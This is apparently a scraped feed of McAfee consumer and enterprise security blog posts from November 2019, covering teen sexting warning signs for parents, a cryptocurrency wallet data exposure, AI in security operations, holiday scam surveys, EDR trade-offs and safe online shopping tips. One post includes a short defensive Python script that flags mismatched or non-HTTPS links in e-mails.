One of the latest and most comprehensive studies reveals that while adolescent sexting isn’t an epidemic, it’s still happening despite public campaigns to reduce it. The study, published in the journal Archives of Sexual Behavior by Justin Patchin and Sameer Hinduja, surveyed 5,593 American middle and high school students ages 12 to 17.

In summary, the study found:

  • 14% of middle and high school students had received a sexually explicit image from a boyfriend or girlfriend.
  • 6% said they received such an image from someone who was not a current romantic partner.
  • 11% reported sending a sext to a boyfriend or girlfriend.
  • 9% of the students who were asked by a current boyfriend or girlfriend to send a sext complied.
  • 43% of students asked to send a sext by someone who was not a current romantic partner complied.

No, mom, you aren’t crazy.

If you’ve discovered your child is sexting, don’t buy into the flippant (and erroneous) response that “everyone’s doing it.” For those kids who are engaged in sexting, your concerns are more than legitimate.

Sexting can carry enormous emotional, physical, social, and even legal risks. Also, if a situation gets out of hand (not often but it happens), those involved may never fully recover emotionally.

Some signs of sexting

  • Increased secrecy. If your daughter (or son) is sexting, they may become overly protective of their cell phone and hide their screen from public view. They may sleep with their phones under their pillows to safeguard its contents.
  • Grade changes. Grades may drop as risky behaviors edge out day to day responsibilities.
  • Friend changes. If you check your child’s social accounts and notice an increase in flirty photos and language or friends who do the same, it could be a sign of risky digital behavior.
  • Spike in screen time. You may notice your tween or teen on the phone more, leave the room to talk or text, and insist on using their phone from a private place.
  • Anger, defensiveness. While kids may try to rationalize or normalize sexting, your child knows sending a racy photo on a device is risky. Hiding that behavior can cause anger and defensiveness. Your child also likely knows about the specific risks associated with sexting — things like sextortion (pressuring, threatening), revenge porn (sharing to humiliate), bullying, a wrecked reputation, anxiety, and depression. However, she may be in denial that the consequences apply to her personally.

How to respond

Don’t lose your cool or shame. Today’s digital teen culture is something parents haven’t experienced. Peer pressure plays a significant role in sexting. Girls may sext to compete for and win someone’s approval, to prove loyalty or love, or as relational insurance. Boys can be bullied or shamed by male peers if they don’t have girls sexting them.

Keep in mind: What the teenage brain believes to be a good idea at 15 isn’t likely to align with that of a parent. Coming-of-age behaviors in the digital era do not look like they did decades ago. So getting angry, shaming, or getting extreme with restrictions, may not be as useful as working together to figure out why your child is sexting, why it isn’t wise, and how to avoid doing it in the future.

Act quickly. If you discover your child is sexting, immediately remove all suggestive images from your child’s phone and be persistent in getting them deleted from anyone else’s devices. Sexting will often end between the participants without incident. Other situations can escalate. Every situation will be different. Gather all the facts and carefully consider bringing other people into the situation. State laws vary, and sexting allegations can have profound consequences. Some options may be to 1) talk to the other kids or parents involved, 2) speak to the school (if relevant), 3) contact the police (if a situation evolves into conflict or threats), 4) pursue legal action (if warranted), and 5) seek counseling if a situation causes anxiety or depression for your child.

Teach responsibility; consider filtering. Teaching digital responsibility is one of the top tasks of parents today. And a healthy parent-child relationship is the best way to equip your child to deal with and avoid sexting. In addition to discussing the risks, put time limits and phone curfews in place, and consider protecting your family devices with parental controls.

Be proactive. Sexting is a tough but necessary conversation. Start talking to your kids at a young age about the importance of protecting their privacy — information, images, reputation — online. Get specific about what kind of content is okay and not okay to share. Have age-appropriate conversations on how to avoid the temptation of sexting and possible consequences. This handbook from Common Sense Media is an excellent resource as you approach the sexting discussion.

Make the consequences clear. Work together to create ground rules for responsible phone use that include clear consequences. Be prepared to enforce those consequences. If you say you will take away a phone for a week that isn’t used responsibly, be prepared to do that (even if you have to endure not being able to communicate with your child throughout the school day).

Parenting in the digital age certainly isn’t for the faint of heart. Kids are always one poor choice away from an emotional avalanche. Find different ways to let your kids know you are there for them — without condition — to listen, to counsel, and to help them work through any difficult situation.

The post Could Your Child be Sexting? Signs to Look for and Ways to Respond appeared first on McAfee Blogs.

2.2 Million Users Affected By Latest Data Exposure: 4 Tips to Stay Secure https://www.mcafee.com/blogs/consumer/consumer-threat-notices/gatehub-epicbot-data-exposure/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/gatehub-epicbot-data-exposure/#respond Fri, 22 Nov 2019 17:11:56 +0000 /blogs/?p=97581


The digitalization of data allows it to move effortlessly and be accessed from devices and places around the world within a matter of seconds. This also makes it possible for businesses, organizations, and even individuals to collect and analyze this data for a variety of reasons. However, not all of these purposes are well-intentioned. More often than not, cybercriminals use the abundance of digital data to their advantage. According to Ars Technica and security researcher Troy Hunt, password data and other personal information belonging to as many as 2.2 million users of two websites – a cryptocurrency wallet service and a gaming bot provider – has been posted on the Dark Web.

What information is included in these databases? The first data haul includes personal information for as many as 1.4 million accounts from the GateHub cryptocurrency wallet service. The cybercriminal who posted this 3.72GB database stated that it also includes two-factor authentication keys, mnemonic phrases, and wallet hashes. The second haul contains data for about 800,000 accounts on RuneScape’s bot provider EpicBot, including usernames and IP addresses. Both databases include registered email addresses and hashed passwords.

So, what lessons can we learn from this data dump and what can we do to help secure our information? Check out the following security tips to help protect your digital data.

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Watch out for other cyberattacks. Be on high alert for other malicious attacks where cybercriminals could use stolen credentials to exploit users, such as spear phishing.
  • Check to see if you’ve been affected. If you or someone you know has a GateHub or EpicBot account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 2.2 Million Users Affected By Latest Data Exposure: 4 Tips to Stay Secure appeared first on McAfee Blogs.

The AI (R)evolution: Why Humans Will Always Have a Place in the SOC https://www.mcafee.com/blogs/enterprise/the-ai-revolution-why-humans-will-always-have-a-place-in-the-soc/ https://www.mcafee.com/blogs/enterprise/the-ai-revolution-why-humans-will-always-have-a-place-in-the-soc/#respond Wed, 20 Nov 2019 16:00:30 +0000 https://securingtomorrow.mcafee.com/?p=97162


In cybersecurity, the combination of men, women and machines can do what neither can do alone — form a complementary team capable of upholding order and fighting the forces of evil.

The 20th century was uniquely fascinated with the idea of artificial intelligence (AI). From friendly and helpful humanoid machines — think Rosie the Robot maid or C-3PO — to monolithic and menacing machines like HAL 9000 and the infrastructure of the Matrix, AI was a standard fixture in science fiction. Today, as we’ve entered the AI era in earnest, it’s become clear that our visions of AI were far more fantasy than prophecy. But what we did get right was AI’s potential to revolutionize the world around us — in the service of both good actors and bad.

Artificial intelligence has revolutionized just about every industry in which it’s been adopted, including healthcare, the stock markets, and, increasingly, cybersecurity, where it’s being used to both supplement human labor and strengthen defenses. Because of recent developments in machine learning, the tedious work that was once done by humans — sifting through seemingly endless amounts of data looking for threat indicators and anomalies — can now be automated. Modern AI’s ability to “understand” threats, risks, and relationships gives it the ability to filter out a substantial amount of the noise burdening cybersecurity departments and surface only the indicators most likely to be legitimate.

The benefits of this are twofold: Threats no longer slip through the cracks because of fatigue or boredom, and cybersecurity professionals are freed to do more mission-critical tasks, such as remediation. AI can also be used to increase visibility across the network. It can scan for phishing by simulating clicks on email links and analyzing word choice and grammar. It can monitor network communications for attempted installation of malware, command and control communications, and the presence of suspicious packets. And it’s helped transform virus detection from a solely signature-based system — which was complicated by issues with reaction time, efficiency, and storage requirements — to the era of behavioral analysis, which can detect signatureless malware, zero-day exploits, and previously unidentified threats.

But while the possibilities with AI seem endless, the idea that it could eliminate the role of humans in cybersecurity departments is about as far-fetched as the idea of a phalanx of Baymaxes replacing the country’s doctors. While the end goal of AI is to simulate human functions such as problem-solving, learning, planning, and intuition, there will always be things that AI cannot handle (yet), as well as things AI should not handle. The first category includes things like creativity, which cannot be effectively taught or programmed, and thus will require the guiding hand of a human. Expecting AI to effectively and reliably determine the context of an attack may also be an insurmountable ask, at least in the short term, as is the idea that AI could create new solutions to security problems. In other words, while AI can certainly add speed and accuracy to tasks traditionally handled by humans, it is very poor at expanding the scope of such tasks.

There are also tasks that humans currently excel at and that AI could potentially perform someday. But these are tasks in which humans will always have a sizable edge, or which AI shouldn’t be trusted with. This list includes compliance, independently forming policy, analyzing risks, and responding to cyberattacks. These are areas where we will always need people to serve as a check on AI systems’ judgment, check their work, and help guide their training.

There’s another reason humans will always have a place in the SOC: to stay ahead of cybercriminals who have begun using AI for their own nefarious ends. Unfortunately, any AI technology that can be used to help can also be used to harm, and over time AI will be every bit as big a boon for cybercriminals as it is for legitimate businesses.

Brute-force attacks, once on the wane due to more sophisticated password requirements, have received a giant boost in the form of AI. The technology combines databases of previously leaked passwords with publicly available social media information. So instead of trying to guess every conceivable password starting with, say, 111111, only educated guesses are made, with a startling degree of success.

The post The AI (R)evolution: Why Humans Will Always Have a Place in the SOC appeared first on McAfee Blogs.

Are Smart Padlocks Secure Enough to Protect Your Packages? https://www.mcafee.com/blogs/consumer/hackable/are-smart-padlocks-secure-enough-to-protect-your-packages/ https://www.mcafee.com/blogs/consumer/hackable/are-smart-padlocks-secure-enough-to-protect-your-packages/#respond Tue, 19 Nov 2019 18:40:34 +0000 /blogs/?p=97545


“Hackable?” host Geoff Siskind likes to shop online. A lot. What he doesn’t like is how often his packages are stolen from his front porch. Desperate for a solution, he’s intrigued by smart padlocks that promise to protect packages. But after five seasons of hosting “Hackable?” Geoff is skeptical that anything smart is also secure.

On the latest episode, he joins McAfee’s Advanced Threat Research team to learn if what looks like a foolproof way to secure your packages may, in fact, turn out to be anything but. Is a smart lockbox enough to deter digital porch piracy? Or is this episode’s white-hat hacker able to pick the lock without breaking a sweat?

The post Are Smart Padlocks Secure Enough to Protect Your Packages? appeared first on McAfee Blogs.

This Holiday Season, Watch Out for These Cyber-Grinch Tricks https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-season-tricks-survey-us/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-season-tricks-survey-us/#respond Tue, 19 Nov 2019 05:01:38 +0000 /blogs/?p=97496


Whether it be that their shoes are too tight, their heads aren’t screwed on just right, or they’re expressing a little bit of “Bah Humbug,” cyber-grinches and cyber-scrooges everywhere view the holiday season as a perfect opportunity to exploit users. In fact, McAfee recently conducted a survey of over 1,000 adults over the age of 18 in the U.S. from October 10-20, 2019 to shed light on the types of scams they encountered this year. Let’s take a look at how criminals are attempting to steal the fun of the holiday season with various scams.

Ribbons, Wrappings, and Robocalls

The survey revealed that 48% of Americans have been a victim of or know someone who has been a victim of robocalling in 2019, making it the most prevalent scam of the year. Respondents also reported that they had been targeted with email phishing (41%) and text phishing (35%) in 2019. Another popular trend this year among these crooks? What’s old is new again. While cybercriminal activity has become increasingly sophisticated over the years, survey results showed that these less sophisticated scams of Christmas are still a popular avenue for cybercriminals to exploit.

Combined, all these scams have left quite a financial impact. 74% of respondents admitted to losing more than $100 to these scams, while 30% lost more than $500. What’s more, over 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone, posing an even greater threat to users’ data.

Between all the threats stemming from these cyber-grinches and cyber-scrooges, scams have the potential to haunt users’ digital past, present, and future. Which begs the question – what should users do? They can start by first reading McAfee’s own Christmas Carol:

Be on the Lookout for These Cyber-Grinch Tricks

While most users believe that cyber-scams become more prevalent during the holidays, a third don’t actually take any steps to change their online behavior. In fact, by cutting some corners to pave the way for holiday fun, users may be putting themselves at more risk than they realize. While using devices and apps for tasks like holiday shopping, streaming TV shows, and food delivery services, users are sharing more personal information than ever before. By targeting these popular apps, cybercriminals can collect and store key data, including home addresses, credit card information, and account passwords, that they can use for future attacks.

Another trend that’s set to hit unsavvy users this holiday season is phony gift cards, with McAfee’s Advanced Threat Research team discovering phony gift cards sold on the cybercriminal underground. However, the survey found that only 43% of respondents are aware of fake gift cards as a threat. What’s more, users are also failing to check shopping websites, with over one-third (37%) of respondents admitting that they don’t check an email sender or retailer’s website for authenticity. By not being mindful of these grinchy tricks, users open themselves up to many avenues of exploitation.

Securing Your Holiday Season

We must stop these Christmas scams from coming, but how? To help ensure a cyber-grinch doesn’t put a damper on your holiday season, check out the following security tips.

  • Never reuse passwords. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. Ensure that all of your passwords are complex and unique.
  • Go directly to the source. Instead of clicking on a link in an email, it’s always best to check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.
  • Use a tool to help protect your personal information. A solution like McAfee Identity Theft Protection takes a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help keep identities personal and secure.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post This Holiday Season, Watch Out for These Cyber-Grinch Tricks appeared first on McAfee Blogs.

‘Tis the Season for Cybersecurity: Stay Protected This Holiday Season https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-scam-cybersecurity-survey/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-scam-cybersecurity-survey/#respond Tue, 19 Nov 2019 05:01:05 +0000 https://securingtomorrow.mcafee.com/?p=97393

It’s beginning to look a lot like the holiday season – and with the holidays come various opportunities for cyber-scrooges to exploit. While users prepare for the festivities, cybercriminals look for opportunities to scam holiday shoppers with various tricks. To shed more light on how these crooks are putting a damper on users’ holiday season, McAfee surveyed over 8,000 adults over the age of 18 across multiple countries from October 10-20, 2019 on the types of scams they’ve encountered this year.

The Scams of Christmas Past

Cyber-scrooges have upped the ante over the years, using more sophisticated measures to adapt to consumers’ evolving digital lifestyles. However, scams of Christmas Past are still haunting users today, as global findings indicate that email and text phishing are still prevalent. For example, the percentage of respondents stating that they still experience email phishing ranges from 25% in India to a whopping 42% in France. Respondents stating that they still experience text phishing ranged from 21% in India to 35% in Australia.

Additionally, robocalling has seen an increase in popularity in 2019. Fifty-one percent of respondents in France stated that they still receive robocalls, as did 48% of respondents in the U.S. and 32% in Australia, while 34% in Spain and 33% in Germany said they had fallen victim to robocalls.

The Scams of Christmas Present

During the holidays, cyber-scrooges are likely to further exploit scams of Christmas Present to take advantage of users’ generosity. For example, several survey respondents in the U.K., France, Germany, Spain, Australia, India, and Singapore stated that they had fallen victim to fake charity scams in 2019. Knowing that many people enjoy making donations during this time of year, cybercriminals will likely pose as a charity online as a ploy to collect financial data and money from unsuspecting users.

Since many people do a lot of their holiday shopping online, users should also beware of shipping notification scams, as respondents in the U.K., Spain, Australia, India, and Singapore have fallen victim to these scams throughout this year. This scam, along with all those of Christmas Past and Present, proves that as people continue to adopt technology into their everyday lives, they are in turn giving cybercriminals more opportunities to exploit during the holiday season.

The Scams of Christmas Future

Whether it be email phishing or fake charity scams, users must stay updated on common cyber-scrooge practices to help protect their personal and financial data. As more data and user credentials are gathered from breaches, cybercriminals are looking to take their business to the next level and leverage more advanced techniques. For example, the cybercriminal underground poses a threat to users with more than 2.2 billion stolen account credentials made available for purchase in Q1 2019. These crooks will likely continue to sell and share user data across the Dark Web for the possibility of more profit.

Cybercriminals will also leverage data collected from breaches to better understand which users to target and how they can easily target them with social engineering and AI (artificial intelligence). Most users will probably ignore a call from an unknown number, but what about a call from a family member? Cybercriminals will create more sophisticated scams by spoofing a family member’s caller ID in the hopes of exploiting users through more personal engagement.

Attacks will not only likely grow in sophistication but in volume in the future as well. From interactive speakers to IP cameras to other internet-connected devices like thermostats and appliances — IoT devices have greatly increased the attack surface. As we see an increase in the volume of devices going into homes with a lack of security controls built-in, cybercriminals will likely focus on exploiting consumers through these gadgets. The good news? As we look ahead towards the scams of Christmas Future, we can also work to better prepare our networks and devices before we fall into cybercriminals’ traps.

Even though users believe that cyber-scams become more prevalent during the holiday season, a third don’t actually take steps to change their online behavior. To help ensure your holiday season goes off without a hitch, follow these tips to help stay secure:

  • Say so long to robocalls. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected. Let all other unknown calls go to voicemail and never share personal details over the phone.
  • Go directly to the source. Be skeptical of emails or texts claiming to be from companies or charities with peculiar asks or messages. Instead of clicking on a link within the email or text message, it’s best to go straight to the company’s website or contact customer service.
  • Hover over links to verify the URL. The text of a link and the address it actually opens are two different things. If someone sends you an email with a link, hover over it without clicking (on a phone, press and hold) to see where it really goes. If the destination looks suspicious or doesn’t match the sender, don’t interact with it and delete the email altogether.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection can help your holiday shopping spree go smoothly by providing safe web browsing, virus protection, and more.
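The “hover over links” advice above can be automated for anyone who handles suspicious mail in bulk. The following is an added example written for this page, not code from McAfee or from the original post: it parses an HTML e-mail body, pairs each link’s visible text with its real target, and flags anchors where the text names one site but the link opens another (the classic fake shipping notification), plus links that are not HTTPS. The sample message, the hostnames in it and the rule thresholds are constructed for the example; dropping a leading “www.” stands in for a proper public-suffix check.

```python
"""Compare the visible text of e-mail links with where they really point."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML e-mail body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lowercase host of an http(s) URL with a leading 'www.' dropped; '' for anything else.

    Dropping 'www.' is a simplification; a production check would use the public suffix list.
    """
    parsed = urlparse(url)
    if not parsed.scheme:
        parsed = urlparse("http://" + url)  # bare 'fedex.com/track' style link text
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return ""
    host = parsed.hostname.lower()
    return host[4:] if host.startswith("www.") else host


def looks_like_url(text):
    """Visible link text that a reader would take for an address."""
    return "." in text and " " not in text


def suspicious_links(html):
    """Return (href, text, reason) for every anchor that deserves a second look."""
    collector = _LinkCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for href, text in collector.links:
        target = host_of(href)
        if not target:
            continue  # mailto:, tel:, javascript: links are out of scope for this check
        shown = host_of(text) if looks_like_url(text) else ""
        # Text names one site, link opens another (a subdomain of the shown site is fine).
        if shown and shown != target and not target.endswith("." + shown):
            findings.append((href, text, f"text shows {shown} but link opens {target}"))
        elif not href.lower().startswith("https://"):
            findings.append((href, text, "link is not https"))
    return findings


# Constructed sample e-mail body (not a real message): one lookalike shipping link,
# one honest link, one plain-http link to a subdomain and one mailto: link.
SAMPLE_EMAIL = """
<p>Your parcel is waiting. Track it here:
<a href="http://fedex-tracking.example.net/t?id=8813">https://www.fedex.com/tracking</a></p>
<p><a href="https://www.example-shop.com/orders">View your order</a> or visit
<a href="http://deals.example-shop.com/">example-shop.com</a>.
Questions? <a href="mailto:help@example-shop.com">Contact us</a>.</p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print(f"{reason}: [{text}] -> {href}")
```

Run against the sample, the tracking link is reported because its text says fedex.com while the target is fedex-tracking.example.net, and the deals link is reported only for being plain HTTP; the order link and the mailto: link pass.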

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post ‘Tis the Season for Cybersecurity: Stay Protected This Holiday Season appeared first on McAfee Blogs.

Threat Hunting or Efficiency: Pick Your EDR Path? https://www.mcafee.com/blogs/enterprise/endpoint-security/threat-hunting-or-efficiency-pick-your-edr-path/ https://www.mcafee.com/blogs/enterprise/endpoint-security/threat-hunting-or-efficiency-pick-your-edr-path/#comments Tue, 12 Nov 2019 15:00:53 +0000 https://securingtomorrow.mcafee.com/?p=97369

“Do You Want It Done Fast, Or Do You Want It Done Right?” “Yes.”

“Help out more with our business objectives.” “Cover an increasing number of endpoints.” “Cut budgets.” “Make it all work without adding staff.”

Cybersecurity teams face a lot of conflicting objectives—both within their teams and from upper management. But a May 2019 commissioned study conducted by Forrester Consulting on behalf of McAfee really puts a fine point on it: When decision makers were asked which endpoint security goals and initiatives they’re prioritizing for the coming year, the top two responses were “improve security detection capabilities” (87%) and “increase efficiency in the SOC” (76%).

Unfortunately, traditional EDR solutions have made accomplishing both of these goals (and in some cases, even one or the other!) difficult, if not impossible. According to the study, gaps in EDR capabilities have created pain points for 83% of enterprises. For instance, while 40% of enterprises consider threat hunting a critical requirement, only 29% feel their current EDR solutions fully meet that need. On an even more basic level, 36% worry their EDR solution doesn’t surface every threat that breaks through—while an equal number of respondents say the alerts that are surfaced by their EDR are frequently not relevant or worth investigating.

These numbers clearly show there’s a lot of room for improvement, but at the same time, these two goals seem to be less than complementary. How would you choose to try and meet them?

Scenario 1: The Status Quo

Your team continues utilizing their traditional EDR solution on its own.

You lose points in efficiency out of the gate—according to Forrester, 31% of companies say that the systems are so complex, their junior staff lack the skillset to triage and investigate alerts without senior staff.

The number of alerts output by traditional EDR solutions will cost you efficiency in another way: another 31% of respondents say their teams struggle to keep up with the volume of alerts generated by their EDRs.

On the threat detection side, you’re not starting out with a perfect score, either: Again, keep in mind that more than a third of respondents believe that, even with this large volume of alerts, not everything is being caught.

As a baseline, let’s assume you’re starting out with a 7 in Threat Detection, and a 3.5 in Efficiency.
You’re still a long way from meeting your goals. Let’s look at our options.

Do you want to:

  • Add more staff members
  • Bolt on more software
  • Hire an MDR

Scenario 2: Add more staff members

With efficiency seeming such a far-off goal, your team decides to focus its efforts on threat detection. To help manage the number of alerts, you hire two new employees. You still have every bit as much noise coming from your EDR, and it still isn’t catching everything, but your team has marginally more ability to triage and respond to threats. You gain a point for threat detection, but a look at your department budget sheet shows your efficiency score is basically shot.

Final Score: 8 in Threat Detection, and a 2 in Efficiency.

Scenario 3: Bolting On More Software

Other businesses are taking a different tack. They’re keeping their traditional EDR solution, but they’re also bolting on more point solutions to help catch things that fall through the cracks. If you choose to go this route, your threat detection capabilities go up… but between all the duplicate alerts, separate interfaces, and near complete lack of integration, your team is critically bogged down. With 31 percent of companies reporting that junior staff can’t triage alerts on traditional EDR systems without senior help, senior analysts end up managing all the alerts on all the interfaces on their own.

All this software isn’t cheap, and you’re losing time in both training in all of it, and in switching back and forth. Meanwhile, the solutions that were supposed to improve your threat detection capabilities are doing so … somewhat … but with things falling through the cracks amidst the chaos and analyst fatigue setting in, you wouldn’t know it.

Final Score: 7.5 in Threat Detection, 1.5 in Efficiency.

Scenario 4: Partnering with an MDR

You don’t want to hire any more staff—and even if you did, there aren’t many to hire. So instead you hire a Managed Detection and Response (MDR) provider to do what your EDR should be doing, but isn’t. You partner with the most reputable MDR you can find, and you’re confident that between what you’re doing and what they’re doing, there isn’t much getting past you. But you’re also paying twice to get a single set of capabilities.

Final Score: 9 in Threat Detection, 1 in Efficiency

Clearly, it’s time to try something new

  • I want to improve my efficiency with my current EDR!
  • I want to try something better.

Scenario 5: Improving efficiency with current EDR

How do you make a first-gen EDR more efficient? You don’t. In other words, if you want to get more out of an EDR that doesn’t utilize the latest technologies, the only adjustments you can make here have to come from your team. If you could get more threat detection mileage out of the same number of team members, your efficiency level would naturally rise.

Initial Score: 8 in Threat Detection, 4 in Efficiency

But as you soon find out, the mandatory late nights and your “you’d better step it up or else!” attitude aren’t exactly doing wonders for morale. With cybersecurity professionals in high demand everywhere, it isn’t long before you’re down at least one team member. Now you have four team members doing the work of five. Which sounds decent…

Intermediate Score: 6 in Threat Detection, 6 in Efficiency

… until an enterprising hacker takes note of your shorthandedness and targets you, hoping to use your situation to their advantage. Unfortunately, not only do you have a highly imperfect traditional EDR system and four employees trying to do the work of five … you have four disgruntled employees trying to do the work of five. According to IDC, in organizations that have experienced a breach in the last 12 months, those staff who are extremely satisfied are, on average, more likely to report fewer hours to identify the breach (11 hours) than those who are dissatisfied (23 hours). Guess which camp your team falls into?

Before long, your company is brought to its knees by a major attack. The press is all over it, and confidence in your company plummets. Your company’s reputation might recover … eventually … but things aren’t looking so good for you.

Final Score: Game Over.

Scenario 6: I want to try something better.

You’ve heard from your friends and colleagues about what doesn’t work. And, of course, you’ve read the horror stories. But you’re still left with two disparate goals. What if there was a way to increase threat detection capabilities without hiring more personnel, outsourcing what your EDR should be able to handle but isn’t, or creating a system with more bolts than Frankenstein’s monster?

According to Forrester, there is a way to bridge the goals of greater efficiency and better threat detection. With AI guided investigation, your junior analysts will be able to triage threats like your more seasoned analysts, freeing your senior analysts to focus on mission-critical tasks. And with less noise, your team will be free to focus on more of the right alerts.

Survey respondents backed this up: 35 percent believe AI-guided investigations will lead to fewer breaches, and 52 percent think they’ll lead to improved efficiency. Mission accomplished.

Final Score: You=1, Hackers=0.

To read more about how AI-guided investigation can help revolutionize your SOC, click here.

The post Threat Hunting or Efficiency: Pick Your EDR Path? appeared first on McAfee Blogs.

Secure Your Black Friday & Cyber Monday Purchases https://www.mcafee.com/blogs/consumer/black-friday-cyber-monday-safe-online-shopping/ https://www.mcafee.com/blogs/consumer/black-friday-cyber-monday-safe-online-shopping/#respond Mon, 11 Nov 2019 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=97282

As we gear up to feast with family and friends this Thanksgiving, we also get our wallets ready for Black Friday and Cyber Monday. Black Friday and Cyber Monday have practically become holidays themselves, as each year they immediately shift our attention from turkey and pumpkin pie to holiday shopping. Let’s take a look at these two holidays, and how their popularity can impact users’ online security.

The Origins of the Holiday Shopping Phenomenon

You might be surprised to find out that the term “Black Friday” was first associated with a financial crisis, not sales shopping. According to The Telegraph, the U.S. gold market crashed on Friday, September 24, 1869, leaving Wall Street bankrupt. It wasn’t until the 1950s that Black Friday was used in association with holiday shopping when large crowds of tourists and shoppers flocked to Philadelphia for a big football game. Because of all the chaos, traffic jams, and shoplifting opportunities that arose, police officers were unable to take the day off, coining it Black Friday. It wasn’t until over 50 years later that Cyber Monday came to fruition when Shop.org coined the term as a way for online retailers to participate in the Black Friday shopping frenzy.

Growth Over the Years

Since the origination of these two massive shopping holidays, both have seen incredible growth. Global interest in Black Friday has risen year-over-year, with 117% average growth across the last five years. According to Forbes, last year’s Black Friday brought in $6.2 billion in online sales alone, while Cyber Monday brought in a record $7.9 billion.

While foot traffic seemed to decrease at brick-and-mortar stores during Cyber Week 2018, more shoppers turned their attention to the internet to participate in holiday bargain hunting. Throughout this week, sales derived from desktop devices came in at 47%, while mobile purchases made up 45% of revenue and tablet purchases made up 8% of revenue.

So, what does this mean for Black Friday and Cyber Monday shopping this holiday season? Adobe Analytics projects that Thanksgiving and Black Friday will bring in $12.3 billion in online sales and Cyber Monday will bring in $9.48 billion. If one thing’s for sure, this year’s Black Friday and Cyber Monday sales are shaping up to be the biggest ones yet for shoppers looking to snag some seasonal bargains. However, the uptick in online shopping activity provides cybercriminals with the perfect opportunity to wreak havoc on users’ holiday fun.

Holiday Bargain or Shopping Scam?

Inherently, Black Friday and Cyber Monday are pretty similar, with the main difference being where users choose to shop. While Black Friday sees a mix of online and in-store shoppers, most consumers will participate in Cyber Monday sales from their mobile phones or desktops at work. Plus, with mobile Cyber Week sales increasing year over year, it’s clear that users are gravitating towards the convenience of shopping on the go. However, the increase in mobile online shopping also creates an opportunity for cybercriminals to exploit. The latest McAfee Mobile Threat Report revealed a huge increase in device backdoors, fake apps, and banking trojans. With more and more users turning to their smartphones this holiday shopping season, they are in turn potentially subject to a wide variety of mobile cyberattacks.

Another threat to users’ holiday shopping sprees? Rushed purchases. Thanks to a later Thanksgiving, Cyber Monday falls on December 2nd, leaving users with one less shopping week between Turkey Day and Christmas. Because of this time crunch, many users are feeling pressured to get their holiday shopping done in time and might forego some basic cybersecurity practices to speed up the online shopping process. This includes not checking online retailer authenticity, falling for fake Black Friday deals, and hastily giving up more personal information than necessary, all in the interest of jumping on a sale before it’s too late.

How to Stay Secure This Holiday Season

In the blur of the holiday shopping frenzy, how can you help protect your personal information online? Before whipping out your credit card this Black Friday and Cyber Monday, check out these cybersecurity tips to ensure your holiday shopping spree goes off without a hitch:

  • Look for the lock icon, but don’t stop there. Secure websites will start with “https,” not just “http,” and your browser shows a padlock next to the web address. The padlock only means the connection is encrypted; it does not tell you who runs the site, and scam sites can use HTTPS too. Check that the domain name is the retailer’s, and if either the padlock or the right domain is missing, don’t enter payment details on that website.
  • If you can help it, shop on your desktop. Although shopping on a smartphone allows you to make purchases on the go, this opens you up to threats like mobile malware and fake shopping apps. Additionally, mobile browsers show only a truncated web address, making it easier for scammers to trick you with clone websites.
  • Ask the critics. Cybercriminals will often create fake websites to try and exploit users looking to get in on the Black Friday and Cyber Monday action. If you’re unsure about a product or retailer, read lots of reviews from trusted websites to help see if it’s legitimate.
  • Be on the lookout for suspicious websites. Misspellings and grammatical errors are often a sign that it’s a rip off of a legitimate site. If the site’s content looks a little rough around the edges, this is probably a sign that it was created by a cybercriminal.
  • Don’t be too optimistic. Beware of bogus Black Friday and Cyber Monday deals with fake “free” offers. If you spot an ad online that seems too good to be true, chances are it probably is.
  • Use a comprehensive security solution. Using a solution like McAfee LiveSafe can help your holiday shopping spree go smoothly by providing safe web browsing, virus protection, and more. Check out our own special Cyber Week Offer here.

Looking for more security tips and trends? Be sure to follow @McAfee Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Secure Your Black Friday & Cyber Monday Purchases appeared first on McAfee Blogs.

Sadfishing, Deepfakes & TikTok: Headlines You May Have Missed https://www.mcafee.com/blogs/consumer/family-safety/sadfishing-deepfakes-tiktok-headlines-you-may-have-missed/ https://www.mcafee.com/blogs/consumer/family-safety/sadfishing-deepfakes-tiktok-headlines-you-may-have-missed/#respond Sat, 09 Nov 2019 15:00:32 +0000 https://securingtomorrow.mcafee.com/?p=97330

